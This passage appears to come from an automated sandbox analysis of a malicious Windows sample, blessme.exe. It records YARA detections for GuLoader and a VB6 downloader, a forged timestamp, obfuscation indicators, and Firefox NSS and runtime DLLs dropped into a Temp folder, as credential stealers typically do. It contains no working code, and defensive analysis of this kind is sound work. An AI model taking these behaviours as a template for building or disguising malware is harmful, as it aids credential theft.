            Source: Binary string: api-ms-win-core-rtlsupport-l1-1-0.pdb source: blessme.exe, 00000001.00000002.305854343.000000001F110000.00000004.00000001.sdmp, api-ms-win-core-rtlsupport-l1-1-0.dll.1.dr
            Source: Binary string: z:\build\build\src\obj-firefox\security\nss\lib\softoken\legacydb\legacydb_nssdbm3\nssdbm3.pdb source: blessme.exe, 00000001.00000003.294411349.000000001EDEC000.00000004.00000001.sdmp, nssdbm3.dll.1.dr
            Source: Binary string: api-ms-win-core-timezone-l1-1-0.pdb source: blessme.exe, 00000001.00000002.305854343.000000001F110000.00000004.00000001.sdmp, api-ms-win-core-timezone-l1-1-0.dll.1.dr
            Source: Binary string: msvcp140.i386.pdbGCTL source: blessme.exe, 00000001.00000003.289575739.000000001E6BC000.00000004.00000001.sdmp, msvcp140.dll.1.dr
            Source: Binary string: api-ms-win-core-string-l1-1-0.pdb source: blessme.exe, 00000001.00000003.287278977.000000001F08C000.00000004.00000001.sdmp, api-ms-win-core-string-l1-1-0.dll.1.dr
            Source: Binary string: api-ms-win-core-file-l2-1-0.pdb source: blessme.exe, 00000001.00000002.305561202.000000001F0C0000.00000004.00000001.sdmp, api-ms-win-core-file-l2-1-0.dll.1.dr
            Source: Binary string: api-ms-win-crt-process-l1-1-0.pdb source: blessme.exe, 00000001.00000003.293794952.000000001ECD0000.00000004.00000001.sdmp, api-ms-win-crt-process-l1-1-0.dll.1.dr
            Source: Binary string: api-ms-win-core-libraryloader-l1-1-0.pdb source: blessme.exe, 00000001.00000003.291777136.000000001F978000.00000004.00000001.sdmp, api-ms-win-core-libraryloader-l1-1-0.dll.1.dr
            Source: Binary string: api-ms-win-core-interlocked-l1-1-0.pdb source: blessme.exe, 00000001.00000003.291777136.000000001F978000.00000004.00000001.sdmp, api-ms-win-core-interlocked-l1-1-0.dll.1.dr
            Source: Binary string: api-ms-win-crt-heap-l1-1-0.pdb source: blessme.exe, 00000001.00000003.293670905.000000001ECA4000.00000004.00000001.sdmp, api-ms-win-crt-heap-l1-1-0.dll.1.dr
            Source: Binary string: api-ms-win-crt-string-l1-1-0.pdb source: blessme.exe, 00000001.00000003.289023195.000000001F090000.00000004.00000001.sdmp, api-ms-win-crt-string-l1-1-0.dll.1.dr

            Data Obfuscation:

            barindex
            Yara detected GuLoaderShow sources
            Source: Yara matchFile source: 00000001.00000002.300469829.0000000000560000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: blessme.exe PID: 5456, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: blessme.exe PID: 4396, type: MEMORY
            Binary contains a suspicious time stampShow sources
            Source: initial sampleStatic PE information: 0xAC22BA81 [Thu Jul 7 10:18:41 2061 UTC]
            Source: initial sampleStatic PE information: 0xAC22BA81 [Thu Jul 7 10:18:41 2061 UTC]
            Yara detected VB6 Downloader GenericShow sources
            Source: Yara matchFile source: Process Memory Space: blessme.exe PID: 5456, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: blessme.exe PID: 4396, type: MEMORY
            Source: blessme.exeStatic PE information: real checksum: 0x2ec58 should be: 0x2dcdc
            Source: blessme.exeStatic PE information: real checksum: 0x2ec58 should be: 0x2dcdc
            Source: C:\Users\user\Desktop\blessme.exeCode function: 0_2_00404421 push ebx; retf 0_2_00404427
            Source: C:\Users\user\Desktop\blessme.exeCode function: 0_2_00405C24 push esi; retf 0_2_00405C6F
            Source: C:\Users\user\Desktop\blessme.exeCode function: 0_2_004056CA push ebx; retf 0_2_004056CB
            Source: C:\Users\user\Desktop\blessme.exeCode function: 0_2_00405513 push edx; iretd 0_2_0040557C
            Source: C:\Users\user\Desktop\blessme.exeCode function: 0_2_0040552C push edx; iretd 0_2_0040557C
            Source: C:\Users\user\Desktop\blessme.exeCode function: 0_2_00406DA2 push cs; retf 0_2_00406DA3
            Source: C:\Users\user\Desktop\blessme.exeCode function: 0_2_00403DA9 push 0000000Fh; iretd 0_2_00403DBB
            Source: C:\Users\user\Desktop\blessme.exeCode function: 0_2_021661A0 push eax; ret 0_2_021661C6
            Source: C:\Users\user\Desktop\blessme.exeCode function: 0_2_00404421 push ebx; retf 0_2_00404427
            Source: C:\Users\user\Desktop\blessme.exeCode function: 0_2_00405C24 push esi; retf 0_2_00405C6F
            Source: C:\Users\user\Desktop\blessme.exeCode function: 0_2_004056CA push ebx; retf 0_2_004056CB
            Source: C:\Users\user\Desktop\blessme.exeCode function: 0_2_00405513 push edx; iretd 0_2_0040557C
            Source: C:\Users\user\Desktop\blessme.exeCode function: 0_2_0040552C push edx; iretd 0_2_0040557C
            Source: C:\Users\user\Desktop\blessme.exeCode function: 0_2_00406DA2 push cs; retf 0_2_00406DA3
            Source: C:\Users\user\Desktop\blessme.exeCode function: 0_2_00403DA9 push 0000000Fh; iretd 0_2_00403DBB
            Source: C:\Users\user\Desktop\blessme.exeCode function: 0_2_021661A0 push eax; ret 0_2_021661C6
            Source: C:\Users\user\Desktop\blessme.exeCode function: 1_3_1E0CA73E push ecx; iretd 1_3_1E0CA73F
            Source: C:\Users\user\Desktop\blessme.exeCode function: 1_3_1E0CA4B8 push esi; iretd 1_3_1E0CA4BB
            Source: C:\Users\user\Desktop\blessme.exeCode function: 1_3_1E0C96EF push cs; retf 1_3_1E0C96F1
            Source: C:\Users\user\Desktop\blessme.exeFile created: C:\Users\user\AppData\Local\Temp\3AA6B366\api-ms-win-core-datetime-l1-1-0.dllJump to dropped file
            Source: C:\Users\user\Desktop\blessme.exeFile created: C:\Users\user\AppData\Local\Temp\3AA6B366\api-ms-win-core-file-l2-1-0.dllJump to dropped file
            Source: C:\Users\user\Desktop\blessme.exeFile created: C:\Users\user\AppData\Local\Temp\3AA6B366\softokn3.dllJump to dropped file
            Source: C:\Users\user\Desktop\blessme.exeFile created: C:\Users\user\AppData\Local\Temp\3AA6B366\api-ms-win-core-console-l1-1-0.dllJump to dropped file
            Source: C:\Users\user\Desktop\blessme.exeFile created: C:\Users\user\AppData\Local\Temp\3AA6B366\api-ms-win-crt-conio-l1-1-0.dllJump to dropped file
            Source: C:\Users\user\Desktop\blessme.exeFile created: C:\Users\user\AppData\Local\Temp\3AA6B366\api-ms-win-crt-environment-l1-1-0.dllJump to dropped file
            Source: C:\Users\user\Desktop\blessme.exeFile created: C:\Users\user\AppData\Local\Temp\3AA6B366\api-ms-win-core-libraryloader-l1-1-0.dllJump to dropped file
            Source: C:\Users\user\Desktop\blessme.exeFile created: C:\Users\user\AppData\Local\Temp\3AA6B366\api-ms-win-crt-multibyte-l1-1-0.dllJump to dropped file
            Source: C:\Users\user\Desktop\blessme.exeFile created: C:\Users\user\AppData\Local\Temp\3AA6B366\api-ms-win-crt-heap-l1-1-0.dllJump to dropped file
            Source: C:\Users\user\Desktop\blessme.exeFile created: C:\Users\user\AppData\Local\Temp\3AA6B366\api-ms-win-core-processthreads-l1-1-0.dllJump to dropped file
            Source: C:\Users\user\Desktop\blessme.exeFile created: C:\Users\user\AppData\Local\Temp\3AA6B366\api-ms-win-crt-locale-l1-1-0.dllJump to dropped file
            Source: C:\Users\user\Desktop\blessme.exeFile created: C:\Users\user\AppData\Local\Temp\3AA6B366\api-ms-win-crt-utility-l1-1-0.dllJump to dropped file
            Source: C:\Users\user\Desktop\blessme.exeFile created: C:\Users\user\AppData\Local\Temp\3AA6B366\nssdbm3.dllJump to dropped file
            Source: C:\Users\user\Desktop\blessme.exeFile created: C:\Users\user\AppData\Local\Temp\3AA6B366\api-ms-win-core-handle-l1-1-0.dllJump to dropped file
            Source: C:\Users\user\Desktop\blessme.exeFile created: C:\Users\user\AppData\Local\Temp\3AA6B366\api-ms-win-core-rtlsupport-l1-1-0.dllJump to dropped file
            Source: C:\Users\user\Desktop\blessme.exeFile created: C:\Users\user\AppData\Local\Temp\3AA6B366\api-ms-win-core-file-l1-2-0.dllJump to dropped file
            Source: C:\Users\user\Desktop\blessme.exeFile created: C:\Users\user\AppData\Local\Temp\3AA6B366\api-ms-win-core-localization-l1-2-0.dllJump to dropped file
            Source: C:\Users\user\Desktop\blessme.exeFile created: C:\Users\user\AppData\Local\Temp\3AA6B366\api-ms-win-crt-filesystem-l1-1-0.dllJump to dropped file
            Source: C:\Users\user\Desktop\blessme.exeFile created: C:\Users\user\AppData\Local\Temp\3AA6B366\nss3.dllJump to dropped file
            Source: C:\Users\user\Desktop\blessme.exeFile created: C:\Users\user\AppData\Local\Temp\3AA6B366\vcruntime140.dllJump to dropped file
            Source: C:\Users\user\Desktop\blessme.exeFile created: C:\Users\user\AppData\Local\Temp\3AA6B366\api-ms-win-core-interlocked-l1-1-0.dllJump to dropped file
            Source: C:\Users\user\Desktop\blessme.exeFile created: C:\Users\user\AppData\Local\Temp\3AA6B366\api-ms-win-core-file-l1-1-0.dllJump to dropped file
            Source: C:\Users\user\Desktop\blessme.exeFile created: C:\Users\user\AppData\Local\Temp\3AA6B366\api-ms-win-crt-string-l1-1-0.dllJump to dropped file
            Source: C:\Users\user\Desktop\blessme.exeFile created: C:\Users\user\AppData\Local\Temp\3AA6B366\api-ms-win-core-errorhandling-l1-1-0.dllJump to dropped file
            Source: C:\Users\user\Desktop\blessme.exeFile created: C:\Users\user\AppData\Local\Temp\3AA6B366\msvcp140.dllJump to dropped file
            Source: C:\Users\user\Desktop\blessme.exeFile created: C:\Users\user\AppData\Local\Temp\3AA6B366\api-ms-win-core-processenvironment-l1-1-0.dllJump to dropped file
            Source: C:\Users\user\Desktop\blessme.exeFile created: C:\Users\user\AppData\Local\Temp\3AA6B366\api-ms-win-core-profile-l1-1-0.dllJump to dropped file
            Source: C:\Users\user\Desktop\blessme.exeFile created: C:\Users\user\AppData\Local\Temp\3AA6B366\api-ms-win-crt-stdio-l1-1-0.dllJump to dropped file
            Source: C:\Users\user\Desktop\blessme.exeFile created: C:\Users\user\AppData\Local\Temp\3AA6B366\mozglue.dllJump to dropped file
            Source: C:\Users\user\Desktop\blessme.exeFile created: C:\Users\user\AppData\Local\Temp\3AA6B366\api-ms-win-crt-runtime-l1-1-0.dllJump to dropped file
            Source: C:\Users\user\Desktop\blessme.exeFile created: C:\Users\user\AppData\Local\Temp\3AA6B366\api-ms-win-core-namedpipe-l1-1-0.dllJump to dropped file
            Source: C:\Users\user\Desktop\blessme.exeFile created: C:\Users\user\AppData\Local\Temp\3AA6B366\api-ms-win-crt-time-l1-1-0.dllJump to dropped file
            Source: C:\Users\user\Desktop\blessme.exeFile created: C:\Users\user\AppData\Local\Temp\3AA6B366\api-ms-win-core-synch-l1-2-0.dllJump to dropped file
            Source: C:\Users\user\Desktop\blessme.exeFile created: C:\Users\user\AppData\Local\Temp\3AA6B366\api-ms-win-core-util-l1-1-0.dllJump to dropped file
            Source: C:\Users\user\Desktop\blessme.exeFile created: C:\Users\user\AppData\Local\Temp\3AA6B366\api-ms-win-crt-process-l1-1-0.dllJump to dropped file
            Source: C:\Users\user\Desktop\blessme.exeFile created: C:\Users\user\AppData\Local\Temp\3AA6B366\api-ms-win-core-memory-l1-1-0.dllJump to dropped file
            Source: C:\Users\user\Desktop\blessme.exeFile created: C:\Users\user\AppData\Local\Temp\3AA6B366\api-ms-win-core-string-l1-1-0.dllJump to dropped file
            Source: C:\Users\user\Desktop\blessme.exeFile created: C:\Users\user\AppData\Local\Temp\3AA6B366\api-ms-win-crt-private-l1-1-0.dllJump to dropped file
            Source: C:\Users\user\Desktop\blessme.exeFile created: C:\Users\user\AppData\Local\Temp\3AA6B366\api-ms-win-core-processthreads-l1-1-1.dllJump to dropped file
            Source: C:\Users\user\Desktop\blessme.exeFile created: C:\Users\user\AppData\Local\Temp\3AA6B366\api-ms-win-core-debug-l1-1-0.dllJump to dropped file
            Source: C:\Users\user\Desktop\blessme.exeFile created: C:\Users\user\AppData\Local\Temp\3AA6B366\api-ms-win-crt-convert-l1-1-0.dllJump to dropped file
            Source: C:\Users\user\Desktop\blessme.exeFile created: C:\Users\user\AppData\Local\Temp\3AA6B366\ucrtbase.dllJump to dropped file
            Source: C:\Users\user\Desktop\blessme.exeFile created: C:\Users\user\AppData\Local\Temp\3AA6B366\api-ms-win-core-timezone-l1-1-0.dllJump to dropped file
            Source: C:\Users\user\Desktop\blessme.exeFile created: C:\Users\user\AppData\Local\Temp\3AA6B366\freebl3.dllJump to dropped file
            Source: C:\Users\user\Desktop\blessme.exeFile created: C:\Users\user\AppData\Local\Temp\3AA6B366\api-ms-win-core-heap-l1-1-0.dllJump to dropped file
            Source: C:\Users\user\Desktop\blessme.exeFile created: C:\Users\user\AppData\Local\Temp\3AA6B366\api-ms-win-crt-math-l1-1-0.dllJump to dropped file
            Source: C:\Users\user\Desktop\blessme.exeFile created: C:\Users\user\AppData\Local\Temp\3AA6B366\api-ms-win-core-sysinfo-l1-1-0.dllJump to dropped file
            Source: C:\Users\user\Desktop\blessme.exeFile created: C:\Users\user\AppData\Local\Temp\3AA6B366\api-ms-win-core-synch-l1-1-0.dllJump to dropped file
            Source: C:\Users\user\Desktop\blessme.exeFile created: C:\Users\user\AppData\Local\Temp\3AA6B366\api-ms-win-core-datetime-l1-1-0.dllJump to dropped file
            Source: C:\Users\user\Desktop\blessme.exeFile created: C:\Users\user\AppData\Local\Temp\3AA6B366\api-ms-win-core-file-l2-1-0.dllJump to dropped file
            Source: C:\Users\user\Desktop\blessme.exeFile created: C:\Users\user\AppData\Local\Temp\3AA6B366\softokn3.dllJump to dropped file
            Source: C:\Users\user\Desktop\blessme.exeFile created: C:\Users\user\AppData\Local\Temp\3AA6B366\api-ms-win-core-console-l1-1-0.dllJump to dropped file
            Source: C:\Users\user\Desktop\blessme.exeFile created: C:\Users\user\AppData\Local\Temp\3AA6B366\api-ms-win-crt-conio-l1-1-0.dllJump to dropped file
            Source: C:\Users\user\Desktop\blessme.exeFile created: C:\Users\user\AppData\Local\Temp\3AA6B366\api-ms-win-crt-environment-l1-1-0.dllJump to dropped file
            Source: C:\Users\user\Desktop\blessme.exeFile created: C:\Users\user\AppData\Local\Temp\3AA6B366\api-ms-win-core-libraryloader-l1-1-0.dllJump to dropped file
            Source: C:\Users\user\Desktop\blessme.exeFile created: C:\Users\user\AppData\Local\Temp\3AA6B366\api-ms-win-crt-multibyte-l1-1-0.dllJump to dropped file
            Source: C:\Users\user\Desktop\blessme.exeFile created: C:\Users\user\AppData\Local